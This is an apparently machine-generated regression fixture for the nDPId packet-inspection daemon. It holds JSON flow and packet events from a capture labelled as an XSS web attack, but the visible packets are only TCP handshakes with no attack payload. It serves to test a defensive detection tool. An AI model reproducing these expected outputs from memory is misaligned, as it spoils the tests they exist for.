+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":2,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5kLiWaZmNMU0paAScSAJYgAAAgQFtAQCCAoD5SUNATtTlwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":3,"flow_last_seen":1499347602224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347602224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZzRAAD4GXqSsEAABwKgKMuZCAFA0xTSl4lmmZ4AQAOWoaAAAAQEICgE7U5gD5SUN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347603507,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347603507,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rD1AAD4GGZOsEAABwKgKMuZQAFBpufjkAAAAAKACchC\/sAAAAgQFtAQCCAoBO1TZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":2,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5lDEx3+iabn45aAScSBR8gAAAgQFtAQCCAoD5SZOATtU2QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":3,"flow_last_seen":1499347603508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347603508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rD5AAD4GGZqsEAABwKgKMuZQAFBpufjlxMd\/o4AQAOXw+QAAAQEICgE7VNkD5SZO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347604752,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347604752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ltJAAD4GLv6sEAABwKgKMuZeAFCga8DCAAAAAKACchC\/2wAAAgQFtAQCCAoBO1YQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":2,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5l5oMbaJoGvAw6AScSB2lQAAAgQFtAQCCAoD5SeFATtWEAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":3,"flow_last_seen":1499347604753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347604753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ltNAAD4GLwWsEAABwKgKMuZeAFCga8DDaDG2ioAQAOUVnQAAAQEICgE7VhAD5SeF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347606078,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347606078,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83l9AAD4G53CsEAABwKgKMuZsAFA9+okEAAAAAKACchBYsgAAAgQFtAQCCAoBO1dbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5332,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":2,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5mwyfi78PfqJBaAScSDLYAAAAgQFtAQCCAoD5SjRATtXWwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":3,"flow_last_seen":1499347606080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347606080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03mBAAD4G53esEAABwKgKMuZsAFA9+okFMn4u\/YAQAOVqZwAAAQEICgE7V1wD5SjR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347607344,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347608596,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347608596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UBJAAD4Gdb6sEAABwKgKMuaIAFDT6AnDAAAAAKACchA\/cwAAAgQFtAQCCAoBO1nRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":2,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5oh16C+h0+gJxKAScSBrnQAAAgQFtAQCCAoD5StGATtZ0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":3,"flow_last_seen":1499347608597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347608597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UBNAAD4GdcWsEAABwKgKMuaIAFDT6AnEdegvooAQAOUKpQAAAQEICgE7WdED5StG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347611162,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347611162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8at5AAD4GWvKsEAABwKgKMuaiAFBCbDaMAAAAAKACchChiwAAAgQFtAQCCAoBO1xSAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":2,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5qKcQtTMQmw2jaAScSD\/rQAAAgQFtAQCCAoD5S3IATtcUgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":3,"flow_last_seen":1499347611163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347611163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0at9AAD4GWvmsEAABwKgKMuaiAFBCbDaNnELUzYAQAOWetAAAAQEICgE7XFMD5S3I"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347612465,"flow_last_seen":1499347612465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347612465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1499347612465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dipAAD4GT6asEAABwKgKMuawAFAlJSuyAAAAAKACchDIWAAAAgQFtAQCCAoBO12YAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":2,"flow_last_seen":1499347612466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5rAZOYT0JSUrs6AScSD4FwAAAgQFtAQCCAoD5S8NATtdmAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":3,"flow_last_seen":1499347612467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347612467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ditAAD4GT62sEAABwKgKMuawAFAlJSuzGTmE9YAQAOWXHgAAAQEICgE7XZkD5S8N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347613718,"flow_last_seen":1499347613718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347613718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} 